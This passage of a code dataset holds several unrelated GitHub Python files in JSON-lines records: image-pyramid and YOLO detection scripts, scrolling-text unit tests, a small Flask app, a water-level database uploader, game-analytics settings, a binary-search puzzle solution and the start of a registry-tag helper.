np.uint8\n fertiges_Bild = np.array(fertiges_Bild, dtype=np.uint8)\n img_without_pad = remove_pad_from_image(fertiges_Bild,img,2048)\n plt.imshow(img)\n plt.title(\"original image PAS\")\n plt.show()\n plt.imshow(img_pad)\n plt.title(\"padded image PAS\")\n plt.show()\n g_if = np.array(g_if, dtype=np.uint8)\n plt.imshow(g_if)\n plt.title(\"downsampled image IF\")\n plt.show()\n plt.imshow(fertiges_Bild)\n plt.title(\"upsampled image IF with PAS Laplacian pyramids\")\n plt.show()\n plt.imshow(img_without_pad)\n plt.title(\"upsampled without padding\")\n plt.show()\n\n'''\nfor g in gaussian_pyramid:\n g = np.array(g, dtype=np.uint8)\n plt.imshow(g)\n plt.show()\n \nfig = plt.figure(figsize=(10,5))\n fig.add_subplot(1, 4, 1)\n plt.imshow(img)\n fig.add_subplot(1, 4, 2)\n plt.imshow(g)\n fig.add_subplot(1, 4, 3)\n plt.imshow(fertiges_Bild)\n fig.add_subplot(1, 4, 4)\n plt.imshow(img_without_pad)\n plt.show()\n'''","repo_name":"LauraWenderoth/Bachelorarbeit_Kidney_Stain_Transfer","sub_path":"laplacian_scaling.py","file_name":"laplacian_scaling.py","file_ext":"py","file_size_in_byte":6096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12468087415","text":"# import packages\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport os\n\n# construct the argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to input image\")\nap.add_argument(\"-y\", \"--yolo\", required=True, help=\"base path to the Yolo directory\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5, help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=0.3, help=\"threshold when applying non-maxima suppression\")\nargs = vars(ap.parse_args())\n\n# load the COCO class labels\nlabelsPath = os.path.sep.join([args[\"yolo\"], \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n# initialize a list of colors to represent each label in the class labels\nnp.random.seed(54)\nCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3), dtype=\"uint8\")\n\n# define path to Yolo weights and model configuration\nweightsPath = os.path.sep.join([args[\"yolo\"], \"yolov3.weights\"])\nconfigPath = os.path.sep.join([args[\"yolo\"], \"yolov3.cfg\"])\n\n# load our Yolo object detector trained on the COCO dataset (80 classes)\nprint(\"[INFO] ... loading Yolo model from disk\")\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\n# load input image and grab its spatial dimensions\nimage = cv2.imread(args[\"image\"])\n(H, W) = image.shape[:2]\n\n# determine the output layer names that we need from Yolo\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# construct a blob from the input image and then perform a forward pass\n# of the Yolo object detector giving us our bounding boxes and associated probabilities\nblob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\nprint(\"[INFO] ... 
Yolo took {:.6f} seconds\".format(end - start))\n\n\n# define output visualization lists\nboxes, confidences, classIDs = [], [], []\n\n# Populate the visualization lists from our Yolo forward pass\n\n# loop over each of the layer outputs\nfor output in layerOutputs:\n # loop over each of the object detections\n for detection in output:\n # extract the class ID and confidence (i.e. probability score) of the current object detection\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n\n # filter out weak predictions by ensuring the detected probability is\n # greater than the minimum probability\n if confidence > args[\"confidence\"]:\n # scale the bounding box coordinates back relative to the\n # size of the image, keeping in mind that YOLO actually\n # returns the center (x, y)-coordinates of the bounding\n # box followed by the boxes' width and height\n box = detection[0:4] * np.array([W, H, W, H]) # scales bounding box for overlay on image\n (centerX, centerY, width, height) = box.astype(\"int\")\n\n # use the center (x, y) coordinates to derive the top and left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n\n # update our output lists\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\n# apply non-maxima suppression to suppress weak, overlapping bounding boxes\n# Note: Yolo does not apply non-maxima suppression for us, so we need to explicitly apply it\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, args[\"confidence\"], args[\"threshold\"])\n\n# applying non-maxima suppression suppresses overlapping bounding boxes, keeping only the most\n# confident ones\n\n# Draw the bounding boxes and class text on the original image\n# ensure at least one detection exists\nif len(idxs) > 0:\n # loop over the indexes we are keeping\n for i in idxs.flatten():\n # extract the bounding box coordinates\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n\n # draw a bounding box rectangle and label on the image\n color = [int(c) for c in COLORS[classIDs[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = \"{}: {:.4f}\".format(LABELS[classIDs[i]], confidences[i])\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\n# show the output image\ncv2.imshow(\"Image\", image)\ncv2.waitKeyEx(0)\n\n\n\n","repo_name":"BLarzalere/AI","sub_path":"Object Detection/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31899240605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 23 15:12:37 2018\n\n@author: Sebastien Roy\n\"\"\"\n\nimport unittest\nimport time\nimport logging\n\n\nfrom scrollingtext import ScrollingText\n\nclass test_ScrollingText(unittest.TestCase):\n \"\"\" Unit tests for the ScrollingText class\n \"\"\"\n\n def setUp(self):\n \"\"\" Initialisation\n \"\"\"\n self._current_text = \"\"\n self._text_counter = []\n logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',\n level=logging.ERROR\n )\n\n\n\n def text_function(self):\n return \"test that is very long\"\n\n def text_callback(self, originator, value):\n self._current_text = value\n\n def test_initial_value(self):\n \"\"\" This tests the initial value of the output text\n \"\"\"\n print(\"---------------------------\")\n print(\"Beginning test initial 
value...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.1,\n scroll_end_delay=0.05, scroll_rate=0.01)\n # check that the callback is not called at the initialization\n self.assertEqual(self._current_text, \"\")\n\n scroll_text.start()\n # the text is now the first 5 letters of the given text\n # no wait is necessary to give the text\n self.assertEqual(self._current_text, \"test \")\n scroll_text.stop()\n print(\"...end test initial value\")\n\n def test_text_lenght(self):\n \"\"\" This checks that, once initialized, the length of the output text\n is always the same\n \"\"\"\n print(\"---------------------------\")\n print(\"Beginning test text length...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.1,\n scroll_end_delay=0.05, scroll_rate=0.01)\n scroll_text.start()\n self.assertEqual(len(self._current_text), 5)\n time.sleep(0.1)\n self.assertEqual(len(self._current_text), 5)\n time.sleep(0.1)\n self.assertEqual(len(self._current_text), 5)\n scroll_text.stop()\n print(\"... end test text length.\")\n\n def test_restart(self):\n \"\"\" This checks that a scrolling text can be paused and resumed\n \"\"\"\n print(\"---------------------------\")\n print(\"Beginning test restart...\")\n scroll_text = ScrollingText(self.text_function, self.text_callback, 5,\n refresh_rate=0, scroll_begin_delay=0.05,\n scroll_end_delay=0.05, scroll_rate=0.01)\n\n # The text function returns \"test that is very long\"\n # So, at beginning, the text should start with \"test\"\n scroll_text.start()\n self.assertTrue(self._current_text.startswith(\"test\"))\n\n # after 0.1 seconds, the text should have scrolled\n time.sleep(0.1)\n self.assertFalse(self._current_text.startswith(\"test\"))\n\n # during the pause, the text should not change\n scroll_text.pause()\n paused_text = self._current_text\n time.sleep(0.1)\n self.assertEqual(paused_text, self._current_text)\n\n # once resumed, the text should change again\n # and the text should be reset to initial\n scroll_text.resume()\n self.assertTrue(self._current_text.startswith(\"test\"))\n time.sleep(0.15)\n self.assertFalse(self._current_text.startswith(\"test\"))\n\n scroll_text.stop()\n print(\"... 
end test restart.\")\n\n def counting_callback(self, originator, value):\n #nanos = time.time_ns()\n nanos = time.time()\n self._text_counter.append((nanos, value))\n\n def count_text_function(self):\n return \"0123456789\"\n\n def test_count_and_time(self):\n \"\"\" This test measures the time between the different updates of the text\n \"\"\"\n print(\"---------------------------\")\n print(\"Beginning test count and time...\")\n scroll_text = ScrollingText(self.count_text_function, self.counting_callback,\n 5, refresh_rate=0, scroll_begin_delay=0.05,\n scroll_end_delay=0.07, scroll_rate=0.01)\n scroll_text.start()\n # The scroll text needs 0.2 = 0.05s + 5x0.01s + 0.07s to return to the beginning\n # So, it needs 0.27s to restart scrolling after the first cycle\n time.sleep(0.3)\n scroll_text.stop()\n\n # verify results\n full_text = self.count_text_function()\n self.assertGreaterEqual(len(self._text_counter), 7,\n \"The scrolling text should have changed at least 7 times.\")\n\n t0 = self._text_counter[0][0]\n text = self._text_counter[0][1]\n self.assertEqual(text, full_text[0:5], \"The initial text should be the first five characters of the text function\")\n\n # Check first iteration\n t1 = self._text_counter[1][0]\n delta1 = t1 - t0\n self.assertAlmostEqual(delta1, 0.05,\n msg=\"The first iteration is expected after 0.05s\",\n delta=0.02)\n self.assertEqual(self._text_counter[1][1], full_text[1 : 6], \"The text of the first iteration is expected to be \\\"12345\\\"\")\n\n # check iteration from 2 to the end\n for i in range(2, 6):\n delta_n = self._text_counter[i][0] - self._text_counter[i - 1][0]\n text = self._text_counter[i][1]\n self.assertAlmostEqual(delta_n, 0.01, delta=0.002)\n self.assertEqual(text, full_text[i : i + 5])\n\n # check that the last iteration is longer\n delta_last = self._text_counter[6][0] - self._text_counter[5][0]\n self.assertAlmostEqual(delta_last, 0.07, delta=0.02,\n msg=\"The last iteration should last 0.07s\")\n # Then, the new cycle begins\n delta_new = self._text_counter[7][0] - self._text_counter[6][0]\n self.assertAlmostEqual(delta_new, 0.05, delta=0.02)\n text_new = self._text_counter[6][1]\n self.assertEqual(text_new, full_text[0:5],\n msg=\"The scrolling text should start a new cycle after 7 iterations\")\n\n print(\"... end test count and time.\")\n","repo_name":"sebastienroy/mamemasradio","sub_path":"python/test/test_scrollingtest.py","file_name":"test_scrollingtest.py","file_ext":"py","file_size_in_byte":6433,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"21499633358","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index_home():\n return render_template('index.html')\n\n@app.route('/test', methods=['GET'])\ndef index_test():\n if request.method == 'GET':\n print(\"GET!\")\n return render_template('index2.html')\n else:\n return \"
error
\"\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)","repo_name":"dimigoIOT/project","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1656643968","text":"from cmath import isnan\n\nimport pandas as pd\n\n# import requests as requests\n\nfrom nmat.db import get_db_client\nfrom nmat.geo_utils import latlon_to_utm\nfrom nmat.query import execute_fetch, execute_insert, make_insert, make_select\nfrom nmat.util import message, warning, info, error\n\nCKAN_URL = \"https://catalog.newmexicowaterdata.org/\"\n\n\ndef add_records_to_db(client, wellid, pointid, group, dry=True, verbose=True):\n for i, row in group.iterrows():\n info(f\"Adding {i}, {row['PointID']} waterlevels to database\")\n\n keys = [\n \"WellID\",\n \"PointID\",\n \"DateMeasured\",\n \"DepthToWaterBGS\",\n \"MPHeight\",\n \"MeasuringAgency\",\n \"DataSource\",\n \"MeasurementMethod\",\n \"PublicRelease\",\n ]\n\n values = [\n str(wellid),\n pointid,\n row[\"Date\"].date(),\n row[\"DepthToWaterBGS\"],\n row[\"MPHeight\"],\n row[\"MeasuringAgency\"],\n row[\"DataSource\"],\n row[\"Method\"],\n int(row[\"PublicRelease\"].lower() == \"yes\"),\n ]\n\n sql = make_insert(\"WaterLevels\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n\ndef add_well_to_db(client, row, pointid=None, dry=True, verbose=True):\n if pointid is None:\n result = get_last_point_id_like(client, \"BC-\", verbose=verbose)\n last_pointid = result[\"PointID\"]\n\n n = int(last_pointid.split(\"-\")[1])\n pointid = f\"BC-{n + 1:04n}\"\n\n keys = [\n \"PointID\",\n \"SiteNames\",\n \"Easting\",\n \"Northing\",\n \"Latitude\",\n \"Longitude\",\n \"CoordinateMethod\",\n \"Altitude\",\n \"AltitudeMethod\",\n \"AlternateSiteID\",\n \"SiteType\",\n \"DataReliability\",\n \"DateCreated\",\n \"County\",\n \"State\",\n ]\n lat, lon = row[\"Lat_DD\"], row[\"Long_DD\"]\n easting, northing = latlon_to_utm(lon, lat)\n\n values = [\n pointid,\n row[\"Site Name\"],\n easting,\n northing,\n lat,\n lon,\n row[\"CoordinateMethod\"],\n row[\"Altitude\"],\n row[\"Alt_Method\"],\n row[\"AlternateSiteID\"],\n row[\"SiteType\"],\n row[\"DataReliability\"],\n row[\"DateCreated\"],\n \"BERNALILLO\",\n \"NM\",\n ]\n\n sql = make_insert(\"Location\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n result = get_location_id(client, pointid, verbose=verbose)\n if result is None:\n error(f\"Failed to get location id for {pointid}\")\n return\n location_id = str(result[\"LocationID\"])\n\n keys = [\"PointID\", \"LocationID\", \"ProjectName\"]\n for pn in (\"ProjectName1\", \"ProjectName2\"):\n values = [pointid, location_id, row[pn]]\n sql = make_insert(\"ProjectLocations\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n keys = [\"LocationId\", \"PointID\", \"OSEWellID\", \"WellDepth\", \"WellPdf\"]\n values = [\n location_id,\n pointid,\n isnannone(row, \"OSEWellID\"),\n isnannone(row, \"WellDepth\"),\n isnannone(row, \"WellPdf\"),\n ]\n sql = make_insert(\"WellData\", keys)\n execute_insert(sql, values, client=client, dry=dry, verbose=verbose)\n\n return pointid\n\n\ndef isnannone(row, key):\n v = row[key]\n if isnan(v):\n return None\n return v\n\n\ndef get_location_id(client, pointid, verbose=True):\n sql = make_select(\n attributes=\"LocationID\", table=\"Location\", where=f\"PointID = '{pointid}'\"\n )\n return 
execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_last_point_id_like(client, point_id, verbose=True):\n \"\"\"\n This function is used to get the last PointID from the database that is like point_id.\n :param point_id:\n :return:\n \"\"\"\n sql = make_select(where=f\"PointID LIKE '{point_id}%'\", order=f\"PointID DESC\")\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_point_id(client, point_id, verbose=True):\n \"\"\"\n This function is used to get the point_id from the database.\n :param point_id:\n :return:\n \"\"\"\n\n sql = make_select(\n attributes=\"PointID, WellID\", table=\"WellData\", where=f\"PointID = '{point_id}'\"\n )\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_latest_record(client, pointid, verbose=True):\n sql = make_select(\n table=\"WaterLevels\", where=f\"PointID = '{pointid}'\", order=\"DateMeasured DESC\"\n )\n return execute_fetch(sql, client=client, fetch=\"fetchone\", verbose=verbose)\n\n\ndef get_latest_data():\n resource_id = \"\"\n\n url = f\"{CKAN_URL}/datastore/dump/{resource_id}\"\n # resp = requests.get(url)\n # return resp.text\n\n\ndef upload_wells_from_file(p, sheetname, client=None, dry=True, verbose=False):\n message(f\"Uploading wells from {p}, sheet={sheetname}, dry={dry}\")\n if client is None:\n client = get_db_client()\n\n df = pd.read_excel(p, sheet_name=sheetname)\n for i, row in df.iterrows():\n add_well_to_db(client, row, pointid=row[\"PointID\"], dry=dry, verbose=verbose)\n\n\ndef upload_waterlevels_from_file(p, sheetname, client=None, dry=True, verbose=False):\n message(f\"Uploading waterlevels from {p}, sheet={sheetname}, dry={dry}\")\n\n if client is None:\n client = get_db_client()\n\n df = pd.read_excel(p, sheet_name=sheetname)\n\n # filter out any rows with Well_Name that starts with Z -\n print(df[\"Site_Name\"])\n filtered = df[~df[\"Site_Name\"].str.startswith(\"Z -\")]\n out = []\n # group df by Well_Name column\n grouped = filtered.groupby(\"Site_Name\")\n for i, (name, group) in enumerate(grouped):\n try:\n # check if in database\n repr_row = group.iloc[0]\n\n pointid = repr_row[\"PointID\"]\n if pointid and pointid != \"nan\":\n info(f\"Checking if {name}, ({pointid}) in database\")\n result = get_point_id(client, pointid, verbose=verbose)\n pointid, wellid = (\n (result[\"PointID\"], result[\"WellID\"]) if result else (None, None)\n )\n else:\n info(f\"no PointID provided. Assuming {name} not in database\")\n break\n\n if not pointid:\n # warning(f\"No PointID for {i}, {name}. 
skipping\")\n # continue\n pointid = add_well_to_db(client, repr_row, dry=dry, verbose=verbose)\n\n # else:\n\n # iterate over each row in the group\n # sort group by date\n group = group.sort_values(by=\"Date\")\n\n # get the latest record from the database\n dbrecord = get_latest_record(client, pointid, verbose=verbose)\n\n if dbrecord:\n print(\"asdf\", dbrecord[\"DateMeasured\"])\n # filter out all records that are older than the latest record in the database\n group = group[group[\"Date\"].dt.date > dbrecord[\"DateMeasured\"]]\n # print(group)\n # print(group['MSRMNT_Dat'].dt.date)\n\n # get well id for this pointid\n\n # add records to database\n add_records_to_db(client, wellid, pointid, group, dry=dry, verbose=verbose)\n out.append(pointid)\n except Exception as e:\n error(e)\n break\n\n # if i >1:\n # break\n\n with open(\"./nmat/output/addpoints.txt\", \"w\") as f:\n f.write(\"\\n\".join(out))\n\n\ndef main():\n client = get_db_client()\n\n get_latest_data()\n\n p = \"./indata/sp2023berncowls.xlsx\"\n sheetname = \"Sp2023BernCoWLs\"\n upload_waterlevels_from_file(p, sheetname, client=client)\n\n\nif __name__ == \"__main__\":\n main()\n\n# ============= EOF =============================================\n","repo_name":"DataIntegrationGroup/NMAquiferTool","sub_path":"nmat/bc_uploader.py","file_name":"bc_uploader.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14509490818","text":"# -*- coding: utf-8 -*-\nimport os\nfrom settings.base import *\n\nGNA_RETENTION_DAYS_LIST = [1,2,3,4,5,6,7,14,30,60,90]\n\n# web settings\nGNA_WEB_LIST_DAILY_LIMIT = 5\nGNA_WEB_LIST_MONTH_LIMIT = 1\nGNA_WEB_DETAIL_DAILY_LIMIT = 10\nGNA_WEB_DETAIL_MONTH_LIMIT = 12\n\nGNA_WEB_PAGINATOR_HEAD_LIMIT = 1\nGNA_WEB_PAGINATOR_TAIL_LIMIT = 1\nGNA_WEB_PAGINATOR_MID_LIMIT = 1\n\n##### tabulate settings #####\n\n# tabulate daily\nTABULATE_WEB_LIST_DAILY_DATE_LIMIT = 30\nTABULATE_WEB_LIST_DAILY_DATE_PLATFORM_LIMIT = 1000\nTABULATE_WEB_LIST_DAILY_PLATFORM_DATE_LIMIT = 30\nTABULATE_WEB_LIST_DAILY_DATE_CHANNEL_LIMIT = 1000\nTABULATE_WEB_LIST_DAILY_CHANNEL_DATE_LIMIT = 30\n\nTABULATE_FILTER_LC1_RATIO_GT = 0.38\nTABULATE_FILTER_LC2_RATIO_GT = 1\nTABULATE_FILTER_LC3_RATIO_GT = 0.26\nTABULATE_FILTER_LC4_RATIO_GT = 1\nTABULATE_FILTER_LC5_RATIO_GT = 1\nTABULATE_FILTER_LC6_RATIO_GT = 1\nTABULATE_FILTER_LC7_RATIO_GT = 0.18\nTABULATE_FILTER_LC14_RATIO_GT = 0.10\nTABULATE_FILTER_LC30_RATIO_GT = 0.05\nTABULATE_FILTER_VIP_RATIO_GT = 0.028\nTABULATE_FILTER_ARPPU_GT = 120\n\n# tabulate behave\nTABULATE_PURCHASE_ID_NAME = {1:'月卡',2:'小堆钻石',3:'小袋钻石',4:'大袋钻石',5:'小箱钻石',6:'大箱钻石',7:'钻石宝库'}\nTABULATE_RESOURCE_CHANNEL_ID_NAME = {\n 0: '活动赠送的礼品',\n 1: '体力',\n 2: '伙伴栏',\n 3: '仓库栏',\n 4: '竞技点',\n 5: '前线猎人竞技点',\n 6: '购买钻石',\n 7: '限时礼包',\n 1001: '初始化',\n 1002: '用户做成',\n 1003: '用户信息获取',\n 1005: 'ACTION_TYPE_GET_USER_DATA',\n 1006: '最新信息更新',\n 1007: '玩家信息获取',\n 1008: '新手引导信息更新',\n 1009: '脚本信息更新',\n 1010: 'ACTION_TYPE_NGWORD_CHECK',\n 1011: 'ACTION_TYPE_UPDATE_INFO_LIGHT',\n 1012: 'ACTION_TYPE_UPDATE_EVENT_INFO',\n 1090: '跳过tuto',\n 2004: 'ACTION_TYPE_SETTING_INFO',\n 2005: 'ACTION_TYPE_FRIEND_GET',\n 2006: '好友删除',\n 2008: '好友申请',\n 2009: 'ACTION_TYPE_FRIEND_GET_AGREE',\n 2010: '好友接受',\n 2011: '好友拒绝',\n 2013: '好友搜索',\n 2016: 'ACTION_TYPE_FRIEND_FAVORITE',\n 2030: 'ACTION_TYPE_LITTLE_GUILD_CREATE',\n 2031: 'ACTION_TYPE_LITTLE_GUILD_UPDATE',\n 2032: 'ACTION_TYPE_LITTLE_GUILD_REQUEST',\n 2033: 'ACTION_TYPE_LITTLE_GUILD_INVITE',\n 2034: 
'ACTION_TYPE_LITTLE_GUILD_AGREE',\n 2035: 'ACTION_TYPE_LITTLE_GUILD_REFUSE',\n 2036: 'ACTION_TYPE_LITTLE_GUILD_DELETE',\n 2037: 'ACTION_TYPE_LITTLE_GUILD_QUIT',\n 2038: 'ACTION_TYPE_LITTLE_GUILD_SEARCH',\n 2039: 'ACTION_TYPE_LITTLE_GUILD_CANCEL',\n 2040: 'ACTION_TYPE_LITTLE_GUILD_AUTO_JOIN',\n 2101: '道具编成',\n 2102: '合成装备',\n 2103: '道具售出',\n 2104: '道具装备',\n 2201: 'ACTION_TYPE_TOWN_ENTER',\n 2202: '村庄产出',\n 2203: '村庄建筑升级',\n 2301: 'ACTION_TYPE_GET_GIFT_INFO',\n 2302: '礼包信息修正',\n 2401: '领取邀请特典',\n 2501: '接收钥匙',\n 2502: '使用钥匙',\n 2503: 'ACTION_TYPE_GET_DISTRIBUTE_DUNGEON_KEY_INFO',\n 2504: 'ACTION_TYPE_CONTROL_CENTER_ENTER',\n 2601: 'ACTION_TYPE_INNER_NOTICE_GET',\n 2701: 'ACTION_TYPE_DO_SLOTGAME',\n 3001: 'ACTION_TYPE_TEAM_EDIT',\n 3002: '强化英雄',\n 3003: '进化英雄',\n 3004: '出售卡片',\n 3005: '卡组编成',\n 3006: 'unit收藏',\n 3007: '试炼deck编辑',\n 3008: '获取试炼deck',\n 4002: '任务开始',\n 4003: '任务结束',\n 4004: '战斗复活',\n 4005: '任务重开',\n 4010: 'ACTION_TYPE_GET_CHLNG_MISSION_INFO',\n 4011: 'ACTION_TYPE_CHLNG_MISSION_START',\n 4012: 'ACTION_TYPE_CHLNG_MISSION_FRIEND_LIST',\n 4020: '获取前线猎人排期',\n 4021: 'ACTION_TYPE_FROHUN_START',\n 4022: '获取前线猎人关卡数据',\n 4023: 'ACTION_TYPE_FROHUN_MISSION_START',\n 4024: '前线猎人好友列表',\n 4025: '领取前线猎人排名奖励',\n 4101: '竞技场入场',\n 4102: 'ACTION_TYPE_ARENA_MATCHING',\n 4103: '竞技场对战开始',\n 4104: '竞技场奖励',\n 4105: '竞技场好友一览',\n 4106: '竞技场重启',\n 5001: '抽卡',\n 5003: 'gacha一览',\n 5102: '商店使用',\n 5103: '购买钻石',\n 5104: 'coin购买开始',\n 7101: '礼物一览获得',\n 7102: '礼物领取',\n 7201: '活动领取',\n 8001: 'ACTION_TYPE_MODEL_CHANGE_ID_ISSUE',\n 8002: 'ACTION_TYPE_MODEL_CHANGE_ID_CHECK',\n 8003: 'ACTION_TYPE_MODEL_CHANGE_END',\n 9999: 'debug',\n 10001: '无',\n 10002: '获取RAID副本世界信息',\n 10003: 'RAID副本中购买商品',\n 10004: 'ACTION_TYPE_RAID_UPDATE_SCENARIO_INFO',\n 10005: '获取副本当前状态的信息',\n 10006: '获取房间列表',\n 10007: '更新房间信息',\n 10008: '进入RAID副本房间',\n 10009: 'RAID副本选择副本',\n 10010: 'RAID副本选择好友信息',\n 10011: 'RAID副本获取好友信息',\n 10012: 'RAID副本进入房间内物品编辑',\n 10013: '更新用户副本是否准备状态的信息',\n 10014: '退出副本',\n 10015: '获取房间信息',\n 10016: '副本开始',\n 10017: 'RAID营地开始休息',\n 10018: 'RAID营地状态获取',\n 10019: 'RAID营地结束休息',\n 10020: '完成任务��获',\n 10021: 'RAID副本物品使用',\n 10022: 'ACTION_TYPE_RAID_LIMITED_ITEM_USE',\n 10023: 'ACTION_TYPE_RAID_ITEM_DELETE',\n 10024: 'RAID副本物品合成',\n 10025: 'RAID副本物品编辑',\n 10026: 'RAID副本房间任务退出',\n 10027: 'RAId副本任务完成',\n 10028: '获取Raid副本任务信息',\n 10029: '获取RAID副本简单的信息,开启时间,限时',\n 10030: 'RAID副本任务战斗开始',\n 10031: 'RAID副本任务战斗重新开始(死亡)',\n 10032: 'RAID副本任务战斗结束',\n 10033: '获取聊天记录',\n 10034: '发送聊天信息',\n 10035: '清除服务器缓存',\n 10036: '解散房间',\n 10037: '房间踢人',\n 10038: '获取RAID副本角色信息',\n 10039: '获取RAID副本角色奖杯信息',\n 11111: 'ACTION_TYPE_DAILY_TASK_MAIN',\n 11112: '完成每日任务',\n 11113: '活跃度宝箱打开',\n 11123: 'ACTION_TYPE_DAILY_STAMINA_MAIN',\n 11124: '每日体力获取',\n 11125: '获取每日任务信息',\n 14111: 'ACTION_TYPE_CHARGE_REWARD_MAIN',\n 14112: '索要任务奖励获取',\n 21112: 'ACTION_TYPE_BLACK_MARKET_MAIN',\n 21113: '黑市物品购买',\n 21114: '黑市刷新',\n 61125: 'ACTION_TYPE_DAILY_STAGE_MAIN',\n 81111: 'ACTION_TYPE_DOGGY_MAIN',\n 81112: 'ACTION_TYPE_DOGGY_MIX',\n}\nTABULATE_FACILITY_ID_NAME = {1:'宝玉屋',2:'调合屋',3:'村落升级',4:'音乐屋',5:'道具仓库'}\nTABULATE_LOCATION_ID_NAME = {1:'山',2:'川',3:'田',4:'森'}\nTABULATE_ARENA_CHALLENGE_RESULT_NAME = {0:'失败',1:'成功',2:'未完成'}\nTABULATE_DUNGEON_KEY_DO_TYPE_NAME = {1:'产出',2:'消耗'}\nTABULATE_BM_REFRESH_MONEY_TYPE_NAME = {1:'钻石'}\nTABULATE_BM_BUY_MONEY_TYPE_NAME = {1:'钻石',2:'金币'}\n\nTABULATE_DUNGEON_SLIVER_KEY_CODE = 1\nTABULATE_DUNGEON_GOLD_KEY_CODE = 2\n\n# tabulate monitor\nTABULATE_MONITOR_VIP_CHANNEL_ID_NAME = 
TABULATE_CHANNEL_NAME","repo_name":"sean2009/gm_web_analyze","sub_path":"settings/gna_settings.py","file_name":"gna_settings.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"6709717509","text":"n, k, d = map(int, input().split())\nrules = [list(map(int, input().split())) for _ in range(k)]\n\nleft, right = 1, n\nwhile left <= right:\n    mid = (left+right)//2 # number of the last box that contains an acorn\n    cnt = 0\n    for rule in rules:\n        start, end, gap = rule\n        \n        if mid < start: continue # the last box must not come before start\n        cnt += (min(end,mid)-start) // gap + 1\n\n    if cnt >= d:\n        right = mid - 1\n        res = mid\n\n    elif cnt < d:\n        left = mid + 1\n\nprint(res)\n\n\n'''\nOriginal idea\nimport sys\ninput = sys.stdin.readline\nn, k, d = map(int, input().split())\nboxes = []\nfor _ in range(k):\n    start, end, gap = map(int, input().split())\n    boxes.append(start)\n    while True:\n        start += gap\n        if start <= end:\n            boxes.append(start)\n        else:\n            break\n\nboxes.sort()\nres = 0\nleft, right = 0, n\n\nwhile left <= right:\n    mid = (left+right)//2\n    if mid+1 == d:\n        res = boxes[mid]\n        break\n    elif mid+1 < d:\n        mid = right + 1\n    elif mid+1 > d:\n        mid = left - 1\n\nprint(res)\n'''\n","repo_name":"hun-jae/189Python","sub_path":"week03/15732_도토리_숨기기/장윤아.py","file_name":"장윤아.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"5239578705","text":"import json\nimport requests\nimport datetime\n\n\ndef get_current_image_tag(\n    registry_prefix, project_id, image_name, password, user=\"_json_key\"\n):\n    \"\"\"\n    registry_prefix: the registry-FQDN like eu.gcr.io, gcr.io, docker.azure.XYZ, ...\n    project_id: the project_id in GKE\n    image_name: the name of the docker image\n    password: password to access private registry. In the case of GCR, this is the json\n        string containing the private-key for a service account.\n    user (optional): username to access registry. 
